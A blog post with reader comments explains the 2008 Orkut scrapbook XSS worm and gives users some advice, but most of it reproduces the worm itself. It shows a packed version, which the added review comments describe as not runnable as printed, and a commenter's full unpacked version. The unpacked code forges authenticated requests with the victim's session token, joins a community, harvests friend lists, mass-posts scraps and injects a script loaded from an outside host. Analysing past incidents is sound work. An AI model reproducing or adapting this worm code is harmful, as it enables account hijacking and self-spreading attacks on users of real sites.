Orkut XSS Attack - "2008 vem ai... que ele comece mto bem para vc" thing
A lot of you have probably been wondering how you received a scrap saying " 2008 vem ai... que ele comece mto bem para vc" from me or possibly from some friend of yours.
It's called an XSS attack, or cross-site scripting attack. A piece of JavaScript code (on the client side, that is, your browser) gets executed when you receive a scrap with the spam message from your friend's id (obviously after his orkut session has been infected with the malicious code), and your account then starts scrapping everyone. This happens when you log into your orkut scrapbook to read the malicious scrap.
When someone sends you a spam scrap and you read it, the same scrap is sent to your friends from your account. This will keep spreading for the coming few days, possibly until orkut takes some measures.
Steps you can take:
If possible, change your gmail account password and do not log in to orkut till they sort this out.
Courtesy: Antrix.net(find link in comments)
The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js
// Decoder stub of the "p.a.c.k.e.r"-style JavaScript packer. `p` is the packed
// source, `a` the radix (62 in the call below), `c` the number of dictionary
// words (150), `k` the word list (the '|'-separated string that is split at the
// end of the call) and `e`/`d` scratch slots. It rebuilds the original source by
// replacing every base-`a` token in `p` with the matching word from `k`. This is
// a generic unpacker, not the payload; the payload is the string handed to it by
// the setTimeout() call that follows.
function $(p,a,c,k,e,d) {
// Converts a token index back to its base-`a` textual form (0-9, a-z, then
// A-Z via fromCharCode(c+29)). NOTE(review): the page has lost the comparison
// operators on the next line -- "c35?" is not valid JavaScript; the HTML
// rendering stripped the `<`/`>` characters, so this listing does not run as
// printed.
e=function(c) {
return(c35?String.fromCharCode(c+29):c.toString(36))
};
// Fast path: when String.replace accepts a function replacer, build a lookup
// table `d` keyed by encoded token; a missing word maps back to its own token.
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
// Substitute each dictionary word for its token (whole-word match, global).
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
// Packed worm body, as served from the virus.js URL cited above. setTimeout(code, 1)
// evaluates the string returned by the unpacker after a 1 ms delay. The arguments
// are: the packed source, radix 62, 150 dictionary words, the '|'-separated
// dictionary, and two scratch values (0 and {}). The dictionary alone shows what
// the code touches: orkut endpoints (Compose / CommunityJoin / Scrapbook .aspx),
// the page's POST_TOKEN and signature, a cookie named "wormdoorkut", and the scrap
// text "2008 vem ai... que ele comece mto bem para vc". NOTE(review): the blog has
// wrapped both string literals across raw line breaks, so this listing cannot be
// pasted and run as printed; the readable equivalent is the unpacked version a
// commenter posted further down the page.
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+
(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1)
{h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")
+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7()
{6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0))
;f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();
3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>
[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\'); r.1o=" 1c="\\" 1e="\\">";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|
return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|
wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|S
IG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|
open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400
|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime
|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|
GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild
|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|
raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
// (the trailing 1 is the setTimeout delay in milliseconds)
);
// Bare assignment creating an implicit global `author`; looks like a signature
// left at the end of the script text, but it may equally be a blog artifact --
// can't tell from here.
author="Rodrigo Lacerda"
The orkut website is built on ASP.NET;
if you wish to read the technical side
of preventing XSS attacks in ASP.NET, go here
Update:
1.) The problem seems to have been sorted out by orkut in
2 days (that's long)
2.) 400,000 users affected.
3.) Top users affected by country
US, Germany, India, Brazil
4.) Orkut has still not accepted it was
a mistake from their side. The official orkut blog
is still mum on the incident.
5.) Your password is safe, though it was possible
to hack your gmail password if, say, the virus
redirected you to a page which looked
exactly like orkut and asked you to log in again.
6 comments:
Can we prevent it? Since you have found the cause, you might have a solution as well. Nice analysis though.
More info on this Orkut scrapbook virus thing is here: http://antrix.net/journal/techtalk/orkut_xss.html and in the comments here: http://antrix.net/journal/techtalk/orkut_xss.comments
Here is an unobfuscated version of the script above:
// Worm state and the per-session values it needs to forge requests.
// `index` is the position in the friend list; it is also persisted in the
// "wormdoorkut" cookie further down so a reload resumes where it stopped.
var index=0;
// JSHDF is presumably a global that the orkut page itself exposes; the token and
// page signature read from it are what let the forged POSTs below pass as the
// victim's own actions -- TODO confirm against the original page source.
var POST=JSHDF["CGI.POST_TOKEN"];
var SIG=JSHDF["Page.signature.raw"];
// Returns an XHR object, trying the two legacy IE ActiveX flavours before the
// standard constructor; returns null when none of the three is available.
function createXMLHttpRequest() {
try {
return new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {};
try {
return new ActiveXObject("Microsoft.XMLHTTP")
} catch (e) {};
try {
return new XMLHttpRequest()
} catch (e) {};
return null
}
;
// Writes a cookie `name` holding escape(value). Each of `expires` (a Date,
// rendered with toGMTString), `path`, `domain` and the `secure` flag is appended
// only when supplied.
function setCookie(name,value,expires,path,domain,secure) {
var curCookie=name+"="+escape(value)+(expires?"; expires="+expires.toGMTString():"")+(path?"; path="+path:"")+(domain?"; domain="+domain:"")+(secure?"; secure":"");
document.cookie=curCookie
}
;
// Reads cookie `name` from document.cookie and returns its unescaped value as a
// string, or `false` when the cookie is absent. Callers below rely on both: the
// absence check uses the falsy return, and a stored "0" is truthy as a string.
function getCookie(name) {
var dc=document.cookie;
var prefix=name+"=";
// First look for "; name=" (cookie somewhere after the first entry) ...
var begin=dc.indexOf("; "+prefix);
if (begin==-1) {
// ... otherwise it must sit at the very start, else it is absent.
begin=dc.indexOf(prefix);
if (begin!=0) {
return false
}
} else {
begin+=2
}
;
// The value runs up to the next ";" or to the end of the cookie string.
var end=document.cookie.indexOf(";",begin);
if (end==-1) {
end=dc.length
}
;
return unescape(dc.substring(begin+prefix.length,end))
}
;
// Expires cookie `name` by rewriting it with a 1970 date, then reloads the page
// via history.go(0). Only acts when the cookie currently exists. Not called
// anywhere else in this listing.
function deleteCookie(name,path,domain) {
if (getCookie(name)) {
document.cookie=name+"="+(path?"; path="+path:"")+(domain?"; domain="+domain:"")+"; expires=Thu, 01-Jan-70 00:00:01 GMT";
history.go(0)
}
}
;
// Fetches the victim's own Compose.aspx page (this runs inside the victim's orkut
// session, so the request is authenticated as them), pulls the friend <select>
// out of the returned HTML, hides it in the live document under the id
// "selectedList", and then starts sendScrap().
function loadFriends() {
var xml=createXMLHttpRequest();
if (xml) {
xml.open("GET","http://www.orkut.com/Compose.aspx",true);
// NOTE(review): send() is called here *and* again after the handler is attached
// at the bottom of the function; the packed original shows the same duplication.
// On an already-sent XHR the second call would normally throw, so which of the
// two actually fired presumably depended on the browser of the day.
xml.send(null);
xml.onreadystatechange=function() {
if (xml.readyState==4) {
if (xml.status==200) {
var xmlr=xml.responseText;
// Parse the HTML by assigning it to a detached <div>'s innerHTML.
var div=document.createElement("div");
div.innerHTML=xmlr;
var select=div.getElementsByTagName("select").item(0);
if (select) {
// Drop the first option (presumably a placeholder entry), then park the
// hidden list in the page so sendScrap() can find it by id.
select.removeChild(select.getElementsByTagName("option").item(0));
select.setAttribute("id","selectedList");
select.style.display="none";
document.body.appendChild(select);
sendScrap()
}
} else {
// Any non-200 status retries with no limit and no back-off.
loadFriends()
}
}
}
;
xml.send(null)
}
}
;
// Forges a POST to CommunityJoin.aspx with the victim's token and signature so
// the victim silently joins one fixed community. The community id is spelled out
// as char codes; it decodes to the numeric id that also appears in the packed
// dictionary above. Retries without limit on a non-200 status, then hands off
// to loadFriends().
function cmm_join() {
var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";
var xml=createXMLHttpRequest();
// Unlike loadFriends(), no null check here: a missing XHR implementation throws.
xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);
// The handler is attached only after send(); it still runs because the request
// is asynchronous.
xml.onreadystatechange=function() {
if (xml.readyState==4) {
if (xml.status!=200) {
cmm_join();
return
}
;
loadFriends()
}
}
}
;
// Posts the scrap to one friend per call, walking the hidden "selectedList"
// <select> by `index`; each completion bumps `index`, persists it in the
// "wormdoorkut" cookie and recurses until the list is exhausted.
function sendScrap() {
// `index` comes back from getCookie() as a string, which is why the loose ==
// comparison is what makes this termination check work.
if (index==document.getElementById("selectedList").length) {
return
}
;
// The payload scrap: a greeting plus an <embed> whose attributes carry a
// char-code blob. Decoded, that blob is a DOM snippet that creates a <script>
// element pointing at a second-stage virus.js on files.myopera.com (a different
// path from the URL cited at the top of the page -- cf. the later comment that
// the js URL changed). How orkut's scrap renderer turned those attributes into
// executing script is the XSS bug itself and is not visible from this listing.
// The message text here ("Boas festas...") also differs from the "2008 vem ai..."
// string in the packed dictionary above, so this is a different variant.
var scrapText="Boas festas de final de ano!<br/><br/>[silver]"+new Date().getTime()+"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'String.fromCharCode(115, 99, 114, 105, 112, 116, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 102, 105, 108, 101, 115, 46, 109, 121, 111, 112, 101, 114, 97, 46, 99, 111, 109, 47, 118, 100, 111, 111, 114, 107, 117, 116, 47, 102, 105, 108, 101, 115, 47, 118, 105, 114, 117, 115, 46, 106, 115, 39, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41)'\" width=\"1\" height=\"1\"></embed>";
// Form body: token, scrap text, signature and the recipient id taken from the
// hidden list at the current position.
var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;
var xml=createXMLHttpRequest();
xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);
xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange=function() {
if (xml.readyState==4) {
// Advances regardless of status: a failed send is skipped, not retried.
index++;
var wDate=new Date;
// 86400 is added to a millisecond timestamp, so the cookie lives about 86 s,
// not the day this looks meant to be.
wDate.setTime(wDate.getTime()+86400);
setCookie('wormdoorkut',index,wDate);
sendScrap()
}
}
}
;
// Entry point. Seeds the progress cookie on first run (the stored "0" is a string,
// so getCookie() returns something truthy next time), restores `index` from it,
// and kicks off the cmm_join -> loadFriends -> sendScrap chain. Because the
// counter lives in a cookie, re-opening the page within the cookie's short
// lifetime resumes where the previous run stopped.
if (!getCookie('wormdoorkut')) {
var wDate=new Date;
// Same 86400-millisecond expiry as in sendScrap().
wDate.setTime(wDate.getTime()+86400);
setCookie('wormdoorkut','0',wDate)
}
;
// `index` becomes a string here ("0", "3", ...); see the == check in sendScrap().
index=getCookie('wormdoorkut');
cmm_join();
Swadesh, you cannot stop an XSS attack unless you disable client-side scripting like JavaScript/ActiveX.
The only way to prevent XSS attacks is to sanitize input data.
Something Google should have taken seriously.
What you can do as a user is be very careful about where you enter your password. This means you should only enter your password on orkut's login page and nowhere else, especially not on sites that look like phishing.
If you fear something is not right, close your browser, clear all cookies and files and relogin.
Saw more of this today. Only now, the js url is new. Funny - users actually copy the encoded js into the address bar and run it!
It then decodes and grabs the real js from elsewhere and runs it. It's the same wormdoorkut thing. Worm, if we can call it that.
ohhhhkkkkk :) thanks for information